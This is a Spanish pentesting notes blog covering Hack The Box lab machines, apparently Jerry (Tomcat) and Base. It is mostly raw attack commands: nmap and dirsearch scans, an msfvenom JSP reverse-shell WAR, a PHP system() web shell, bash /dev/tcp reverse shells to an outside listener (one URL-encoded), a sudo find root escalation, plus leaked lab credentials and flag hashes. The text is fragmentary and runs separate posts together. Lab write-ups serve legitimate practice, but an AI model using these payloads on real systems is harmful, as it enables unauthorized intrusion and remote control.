sudo nmap -sSCV -p- --open -n -Pn -vvv --min-rate 5000 -oA allPorts 10.10.10.95
dirsearch -u 10.10.10.95:8080https://book.hack tricks.xyz/network-services-pentesting/pentesting-web/tomcat#msfvenom-reverse-shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.8 LPORT=443 -f war -o revshell.war nc -nvlp 443
Demasiado sencilla incluso para principantes pero un repaso a Tomcat y a msfvenom.
Una máquina clasíca de la plataforma Hack the Box que resulta ser un Metasploitable2 algo más “securizado”. Yo ya había hecho Metasploitable2 por lo que las antiguas notas me han sido útiles.
Results: https://www.hackthebox.com/achievement/machine/1071573/1
Unas vacaciones bastante productivas, permitiéndome resolver dos máquinas que llevaba tiempo con ellas, especialmente Updown que llevaba casi 2 meses con ella, y terminar el recorrido de Starting Point con todas las máquinas VIP, cuyo colofón eran Base, Included y Markup, para las que no habrá writeup por que tienen el suyo oficial.
Esto no es un WriteUp. Este post solo contiene notas de utilidad, datos exfiltrados y enlaces de investigación para el pentesting de una máquina de pruebas.
This is not a WriteUp. This post only contains utility notes, exfiltrated data and research links for pentesting a test machine.
10.129.95.184
<?php echo system($_REQUEST['cmd']);?> /bin/bash -c 'bash -i >& /dev/tcp/10.10.15.216/4499 0>&1' cmd=/bin/bash+-c+'bash+-i+>%26+/dev/tcp/10.10.15.216/443+0>%261' $username = "admin"; $password = "thisisagoodpassword";www-data@base:/$
f54846c258f3b4612f78a819573d158e
sudo find . -exec /bin/sh \; -quit
51709519ea18ab37dd6fc58096bea949
Logro: Link
Por motivos laborales he estado bastante inactivo en la publicación de writeups, aunque he continuado haciendo cajas cada cierto tiempo . Du...
